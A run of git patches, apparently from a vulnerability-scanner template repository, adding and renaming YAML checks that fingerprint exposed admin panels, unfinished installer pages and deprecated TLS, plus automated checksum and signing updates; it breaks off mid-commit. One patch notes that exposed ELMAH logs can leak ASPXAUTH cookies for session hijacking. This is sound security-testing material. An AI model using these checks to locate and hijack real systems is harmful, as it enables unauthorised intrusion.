tags: tech,microfocus,detect + +http: + - method: GET + path: + - "{{BaseURL}}/welcome/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "micro focus iprint appliance", "/ippdocs/clients/", "micro focus iprint", "iprint appliance")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)/welcome/css/core([0-9]+).css' \ No newline at end of file From fe388f7da9dde620d340c7c3762afeda4bd03889 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Tue, 21 May 2024 09:23:30 +0200 Subject: [PATCH 065/847] Increasing severity of elmah logs exposure that can lead to session hijacking --- http/exposures/logs/elmah-log-file.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/logs/elmah-log-file.yaml b/http/exposures/logs/elmah-log-file.yaml index 2013e629ca..e917652778 100644 --- a/http/exposures/logs/elmah-log-file.yaml +++ b/http/exposures/logs/elmah-log-file.yaml @@ -3,9 +3,9 @@ id: elmah-log-file info: name: ELMAH Exposure author: shine,idealphase - severity: medium + severity: high description: | - ELMAH (Error Logging Modules and Handlers) is an application-wide error logging facility that is completely pluggable. It can be dynamically added to a running ASP.NET web application, or even all ASP.NET web applications on a machine, without any need for re-compilation or re-deployment. + ELMAH (Error Logging Modules and Handlers) is an application-wide error logging facility that is completely pluggable. It can be dynamically added to a running ASP.NET web application, or even all ASP.NET web applications on a machine, without any need for re-compilation or re-deployment. In some cases, the logs expose ASPXAUTH cookies allowing to hijack a logged in administrator session. reference: - https://code.google.com/archive/p/elmah/ - https://www.troyhunt.com/aspnet-session-hijacking-with-google/ From 61648817a5767796bf6f33b7d97ebd44b12294eb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 13:37:13 +0530 Subject: [PATCH 066/847] minor update --- ...-management-panel.yaml => microfocus-lifecycle-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/exposed-panels/{microfocus-application-lifecycle-management-panel.yaml => microfocus-lifecycle-panel.yaml} (88%) diff --git a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml similarity index 88% rename from http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml rename to http/exposed-panels/microfocus-lifecycle-panel.yaml index 1265b3970d..8b67bcf5bf 100644 --- a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -1,7 +1,7 @@ -id: microfocus-application-lifecycle-management-panel +id: microfocus-lifecycle-panel info: - name: Micro Focus Application Lifecycle Management Panel - Detect + name: Micro Focus Application Lifecycle Management - Panel author: righettod severity: info description: | From b69272fd9f11d5005af842848c8604c6b06f1a3d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 13:41:05 +0530 Subject: [PATCH 067/847] minor update --- ...nt-appliance-detect.yaml => microfocus-iprint-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/technologies/{microfocus-iprint-appliance-detect.yaml => microfocus-iprint-detect.yaml} (89%) diff --git a/http/technologies/microfocus-iprint-appliance-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml similarity index 89% rename from http/technologies/microfocus-iprint-appliance-detect.yaml rename to http/technologies/microfocus-iprint-detect.yaml index 33d6e1f433..2ace39fa15 100644 --- a/http/technologies/microfocus-iprint-appliance-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -1,4 +1,4 @@ -id: microfocus-iprint-appliance-detect +id: microfocus-iprint-detect info: name: Micro Focus iPrint Appliance - Detect @@ -31,4 +31,4 @@ http: part: body group: 1 regex: - - '(?i)/welcome/css/core([0-9]+).css' \ No newline at end of file + - '(?i)/welcome/css/core([0-9]+).css' From 8c77d593bfb063ac234b2353d97b4aa7fe0ecf4f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 14:17:41 +0530 Subject: [PATCH 068/847] Create forgejo-installer.yaml --- .../installer/forgejo-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/forgejo-installer.yaml diff --git a/http/misconfiguration/installer/forgejo-installer.yaml b/http/misconfiguration/installer/forgejo-installer.yaml new file mode 100644 index 0000000000..707efcffd5 --- /dev/null +++ b/http/misconfiguration/installer/forgejo-installer.yaml @@ -0,0 +1,29 @@ +id: forgejo-installer + +info: + name: Forgejo Installation Page - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Forgejo Installer Page. + metadata: + verified: true + max-request: 1 + fofa-query: body="Installation - Forgejo:" + tags: install,Forgejo,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Installation - Forgejo: Beyond coding. We Forge." + + - type: status + status: + - 200 From 8851962c9780aca669feadc626945d6be619cfc1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 09:09:10 +0000 Subject: [PATCH 069/847] Auto Generated New Template Addition List [Tue May 21 09:09:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index be83b3912a..a0f464fb75 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml +http/misconfiguration/imgproxy-unauth.yaml http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml From 3aefc062b20f2d0ffa35c0578381ff5f3d3f3511 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:09:14 +0000 Subject: [PATCH 070/847] Auto Generated Templates Checksum [Tue May 21 09:09:14 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6cfe2a73f3..d04740ad2a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3294,7 +3294,7 @@ http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 -http/cves/2024/CVE-2024-33288.yaml:be6ad313e9030dff2c7c036bd3887b32777b2120 +http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -5371,6 +5371,7 @@ http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 +http/misconfiguration/imgproxy-unauth.yaml:1a65d48eccec521f1c6530ddf0fa01fdce317513 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -8544,7 +8545,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8df1977f5606fe1c17bd7067982ebf8e2bcee7f3 +templates-checksum.txt:f2b21047cb599e49254aa764ac839fd1da9f9efc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 164bf43349d50c64a9fadc469dfd5109b9f6be0a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 21 May 2024 14:39:47 +0530 Subject: [PATCH 071/847] Create octoprint-installer.yaml --- .../installer/octoprint-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/octoprint-installer.yaml diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml new file mode 100644 index 0000000000..e21886aefa --- /dev/null +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -0,0 +1,29 @@ +id: octoprint-installer + +info: + name: OctoPrint Installation Page - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a OctoPrint Installer Page. + metadata: + verified: true + max-request: 1 + fofa-query: body="Thank you for installing OctoPrint" + tags: install,octoprint,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Thank you for installing OctoPrint" + + - type: status + status: + - 200 From b3be8b6c6c59b6b1d6ef6e0324ddf777a871d6b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 09:09:59 +0000 Subject: [PATCH 072/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 919dfe9a16..996f14cfb9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' + - 'http/misconfiguration/imgproxy-unauth.yaml' - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' From bb0874bc908dfbea4e578a089fd0c7fde3e1bff6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:11:01 +0000 Subject: [PATCH 073/847] Auto Template Signing [Tue May 21 09:11:01 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6065.yaml | 1 + http/misconfiguration/imgproxy-unauth.yaml | 1 + http/misconfiguration/installer/easy-viserlabs-installer.yaml | 1 + http/misconfiguration/installer/ids-skills-installer.yaml | 1 + 4 files changed, 4 insertions(+) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 18d4cec997..a5eee969f4 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502207d57bed9f86a5c3790fab7c7ad97d0ce2a40a3769cadf8c03db9fe296816f3dc022100a72b53af19a2d49d7d48f413a62219b54ef121d6c17aa1c35758f4608f69b95f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index 4816d4045c..5983e67f77 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -33,3 +33,4 @@ http: - 'contains(content_type, "image/png")' - '("386116288" == mmh3(base64_py(body)))' condition: and +# digest: 490a0046304402207f4d9df78ca765af9dc185001591fb4b8bd55d95b545a96a8dbba3243c94bc86022062bc7d5358e243a9a43fcca3c3e5e7a9addfa3f57df917e39c3c00fba60c07c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/easy-viserlabs-installer.yaml b/http/misconfiguration/installer/easy-viserlabs-installer.yaml index 2aea23abde..74f33dd9d9 100644 --- a/http/misconfiguration/installer/easy-viserlabs-installer.yaml +++ b/http/misconfiguration/installer/easy-viserlabs-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402203886cb97031c26142c599a4fa18efc3507221c123a23172407e1a98b70bceeec022006e69859071989ef5d3c00816d76ba1b45c8d60fd3b878d6575542042698560b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml index 38d61998d8..0751655fde 100644 --- a/http/misconfiguration/installer/ids-skills-installer.yaml +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c7c24577b37209b700ba3a4e8031c2e6241c0d3ca584c5d01256a0ca36e5e63e022048981b51d5fcda350ed38362e7124c669d6818ef760b8f744c62e72a10ca7be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f24bc553334ce671da8cf6a805cd9829955fcfe6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 21 May 2024 14:44:02 +0530 Subject: [PATCH 074/847] Update and rename oracle-ebusiness-suite-panel.yaml to oracle-ebusiness-panel.yaml --- ...ebusiness-suite-panel.yaml => oracle-ebusiness-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/exposed-panels/{oracle-ebusiness-suite-panel.yaml => oracle-ebusiness-panel.yaml} (84%) diff --git a/http/exposed-panels/oracle-ebusiness-suite-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml similarity index 84% rename from http/exposed-panels/oracle-ebusiness-suite-panel.yaml rename to http/exposed-panels/oracle-ebusiness-panel.yaml index 12ae7d385b..5cc6798cd6 100644 --- a/http/exposed-panels/oracle-ebusiness-suite-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -1,4 +1,4 @@ -id: oracle-ebusiness-suite-panel +id: oracle-ebusiness-panel info: name: Oracle E-Business Suite Login Panel - Detect @@ -34,4 +34,4 @@ http: part: body group: 1 regex: - - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' \ No newline at end of file + - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' From 94a6ef5f02f1f30059a64a3ea4989b51e6a8bd7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:18:59 +0000 Subject: [PATCH 075/847] Auto Generated Templates Checksum [Tue May 21 09:18:59 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d04740ad2a..ab566aa020 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3217,7 +3217,7 @@ http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 http/cves/2023/CVE-2023-6023.yaml:c537c8a9c6bae27008abc07163a9f67f083e77c1 http/cves/2023/CVE-2023-6038.yaml:38ab1d22eb9a68f42042f232196bd556273e75e1 http/cves/2023/CVE-2023-6063.yaml:ce30538ac7371880f65b9247ca0da8dd6e844c05 -http/cves/2023/CVE-2023-6065.yaml:ec709351895594195cd98f73ad9df3dcd7487d61 +http/cves/2023/CVE-2023-6065.yaml:5583e9a287accbae3c6b84b7f5b4c3e4105e4cea http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 @@ -4174,6 +4174,7 @@ http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-business-control.yaml:1a40c6d9b1046d965a1e9fecd649423329de4de4 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 +http/exposed-panels/oracle-ebusiness-panel.yaml:a1e3aced3d8371d404cc5b765705fefbd76dc7de http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f @@ -5371,7 +5372,7 @@ http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 -http/misconfiguration/imgproxy-unauth.yaml:1a65d48eccec521f1c6530ddf0fa01fdce317513 +http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -5399,7 +5400,7 @@ http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b431 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 -http/misconfiguration/installer/easy-viserlabs-installer.yaml:27d9b628a6aa3315ab36792659f07e5b2aa37968 +http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -5412,7 +5413,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d -http/misconfiguration/installer/ids-skills-installer.yaml:095eb407b5a42dfeb59dc77420189df7a9200249 +http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc @@ -8545,7 +8546,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f2b21047cb599e49254aa764ac839fd1da9f9efc +templates-checksum.txt:a2432d9679b099bea3860e1ab4408077d0c3c80d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d4832be1f88ddbd6ba7fe12f115cdcb3506abe6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 09:20:41 +0000 Subject: [PATCH 076/847] Auto Template Signing [Tue May 21 09:20:41 UTC 2024] :robot: --- http/exposed-panels/oracle-ebusiness-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 5cc6798cd6..648172e2b0 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -35,3 +35,4 @@ http: group: 1 regex: - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' +# digest: 4a0a00473045022039282031436f903368fe6f95110086c3eadc3ce54ed18f742490ac768cf6946b022100dd9c7d19b0484ac641748a2a94286dc023deea5b05eef4c3f2a36e972d5b749d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c89c525d291dc1421a72bf84cea6130e9174699a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 21 May 2024 22:08:07 +0530 Subject: [PATCH 077/847] request sequence update (#9826) * request sequence update * added name to included in output --- ssl/deprecated-tls.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml index 9adc90d54e..7f7352fc4a 100644 --- a/ssl/deprecated-tls.yaml +++ b/ssl/deprecated-tls.yaml @@ -1,7 +1,7 @@ id: deprecated-tls info: - name: Deprecated TLS Detection (TLS 1.1 or SSLv3) + name: Deprecated TLS Detection author: righettod,forgedhallpass severity: info reference: @@ -17,11 +17,12 @@ info: ssl: - address: "{{Host}}:{{Port}}" - min_version: ssl30 - max_version: ssl30 + min_version: tls11 + max_version: tls11 extractors: - type: json + name: tls_1.1 json: - " .tls_version" @@ -31,15 +32,17 @@ ssl: extractors: - type: json + name: tls_1.0 json: - " .tls_version" - address: "{{Host}}:{{Port}}" - min_version: tls11 - max_version: tls11 + min_version: ssl30 + max_version: ssl30 extractors: - type: json + name: ssl_3.0 json: - " .tls_version" # digest: 4a0a00473045022100f731472bbbf929156694224fdc4e2ac33f732d474ede8637b638ecac34b9ef2702203f04bc8a5bf06fbb3e98ec0562fd6ee351aa287cf21c581ba27527449622c15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12bb7df6b1b1248c9b61428a2374c0bd0b888f22 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 16:38:30 +0000 Subject: [PATCH 078/847] Auto Generated New Template Addition List [Tue May 21 16:38:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a0f464fb75..372db2b34f 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml +http/exposed-panels/oracle-ebusiness-panel.yaml http/exposed-panels/pocketbase-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml From a64dc27764f5021911614c2972cfc69beb34611d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 16:38:37 +0000 Subject: [PATCH 079/847] Auto Generated Templates Checksum [Tue May 21 16:38:37 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ab566aa020..9949d77343 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4174,7 +4174,7 @@ http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-business-control.yaml:1a40c6d9b1046d965a1e9fecd649423329de4de4 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 -http/exposed-panels/oracle-ebusiness-panel.yaml:a1e3aced3d8371d404cc5b765705fefbd76dc7de +http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f @@ -8533,7 +8533,7 @@ ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd ssl/c2/sliver-c2.yaml:35ed94dbbde1615aee5d86a3ce75791cc5d4b631 ssl/c2/venomrat.yaml:deffc1efa16ee53701962b41e8cbcab9e106208d -ssl/deprecated-tls.yaml:076aee61b221863263ff2e6704bab32b362b1a67 +ssl/deprecated-tls.yaml:a377f33545c47d31417e3ba1b59ebf63d2970d23 ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 ssl/expired-ssl.yaml:a0c32548eb093d043f77f77eb905ac69e5d0e5b0 ssl/insecure-cipher-suite-detect.yaml:33ff0bbe66e06d4a01b13e40512e2838c9cf7f13 @@ -8546,7 +8546,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a2432d9679b099bea3860e1ab4408077d0c3c80d +templates-checksum.txt:ee4ac2afea6977c2f93528ea016164dc59d5f525 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 45b84b7fb9fccbb2ed19d7b86b3b16c45d6bc45a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 21 May 2024 16:39:12 +0000 Subject: [PATCH 080/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 996f14cfb9..a86de8d1ef 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' + - 'http/exposed-panels/oracle-ebusiness-panel.yaml' - 'http/exposed-panels/pocketbase-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/tiny-rss-panel.yaml' From a87ab39015e9d7ef9000aeed3f96f0b421ff68dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 May 2024 16:40:25 +0000 Subject: [PATCH 081/847] Auto Template Signing [Tue May 21 16:40:25 UTC 2024] :robot: --- ssl/deprecated-tls.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml index 7f7352fc4a..f4eb823cf7 100644 --- a/ssl/deprecated-tls.yaml +++ b/ssl/deprecated-tls.yaml @@ -45,4 +45,4 @@ ssl: name: ssl_3.0 json: - " .tls_version" -# digest: 4a0a00473045022100f731472bbbf929156694224fdc4e2ac33f732d474ede8637b638ecac34b9ef2702203f04bc8a5bf06fbb3e98ec0562fd6ee351aa287cf21c581ba27527449622c15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025cdfdc1eae1340e9d512e1e3b656b0cf356bc434ad0f011fbfa02bb502c4afa022037027e15824922e3f64c641c41b2beab0311f255e2d84e5b4dd1bebff20e944e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d38d268886941cba4c67a6dd52c3193f8bf755d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 May 2024 00:30:19 +0530 Subject: [PATCH 082/847] dropbear --- network/detection/dropbear-cbc-ciphers.yaml | 33 ------------------ network/misconfig/dropbear-weakalgo.yaml | 33 ------------------ network/misconfig/dropbear-weakmac.yaml | 38 --------------------- 3 files changed, 104 deletions(-) delete mode 100644 